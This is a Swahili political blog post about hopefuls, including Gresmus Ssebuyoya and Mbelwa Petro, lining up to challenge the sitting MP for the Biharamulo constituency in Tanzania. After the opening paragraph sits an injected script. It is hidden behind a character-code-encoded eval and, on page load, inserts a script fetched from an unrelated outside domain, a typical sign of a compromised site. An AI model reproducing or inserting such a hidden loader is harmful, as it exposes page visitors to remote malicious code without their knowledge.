WAFAHAMU WATIA NIA UBUNGE JIMBO LA BIHARAMULO

By Baraka Bitariho Mar 13, 2023
<p>Wilayani Biharamulo, njia kama hii inaonekana iko wazi ila picha haionyeshi utelezi uliopo utakaoangusha baadhi ya wagombea wa nafasi tofauti tofauti hasa inapokuja kwenye kinyang'anyiro cha ubunge wa jimbo la Biharamulo.</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Wilayani Biharamulo, njia kama hii inaonekana iko wazi ila picha haionyeshi utelezi uliopo utakaoangusha baadhi ya wagombea wa nafasi tofauti tofauti hasa inapokuja kwenye kinyang’anyiro cha ubunge wa jimbo la Biharamulo.
HAWA NDIYO WANAOJIANDAA KUMSTAFISHA MBUNGE WA BIHARAMULO
Jimbo la Biharamulo magharibbi ni moja ya majimbo Nchini Tanzania ambalo linapamba moto hasa wakati wa Uchaguzi unpokaribia.
Asubuhi ya jumanne 07/03/2023 nikitokea Bukoba nimejifunza mengi kupitia kijiwe cha Kahawa mitaa ya Stand yalipopaki Mabasi yatokayo Biharamulo kwenda mikoani.
Nimeuliza jimbo linaomgozwa na nani,majibu niliyopata yalitosha kunipa picha halisi ya Kisiasa wilayani humo.
Majina haya ndiyo yanayotajwa kulitafuta jimbo hilo :-  James Kasusura, Liberatus Banzunaki,Dr.  Gresmus Ssebuyoya,Osca Mukasa,Dr. Osca, Kilimokwanza, Mr. Alex Kagunze,Shangwe Kabuye , nab Advocate King Manase
Hata hivyo nimeambiwa wapo wengine ambao hawajajipambanua wazi pengine kuogopa kauli za kujipitisha pitisha ili wasianze kushambuliwa na mwenye jimbo kwa sasa Eng. Chiwelesa J. Ezra
Mjomba Magufuli sasa hayupo, uchaguzi ujao sijui utakuaje?
Pamoja na wagombea wote hao, wanakijiwe hawakusita kumtaja Daktari wa Binadamu Gresmus Ssebuyoya kuwaa mwiba kisiasa hasa ikizingatiwa kuwa aliongoza kwenye kura za maoni katika Uchaguzi mkuu uliopita licha ya jina lake kutorudishwa  na aliyekuwa Rais wa Tanzania kipinfi hicho John Pombe magufuli.
Kabla ya kuwa Rais, Magufuli aliwahi kugombea ubunge wa jimbo la Biharamulo akaangushwa kisha kugombea na kushinda jimbo la Chato.
Hata hivyo, licha ya utitiri wa majina ya wana CCM wanaoendelea kuonesha njia ya kupokea kijiti cha uongozi kutoka kwa Chiwelesa pia yupo Kijana Mbelwa Petro ambaye naye anajiandaa kupitia Chama Cha Demokrasia na maendeleo CHADEMA.
Hakika siku ya leo imekwenda vizuri. naenda Ngara,wana Biharamulo nitarudi tena Mugumege!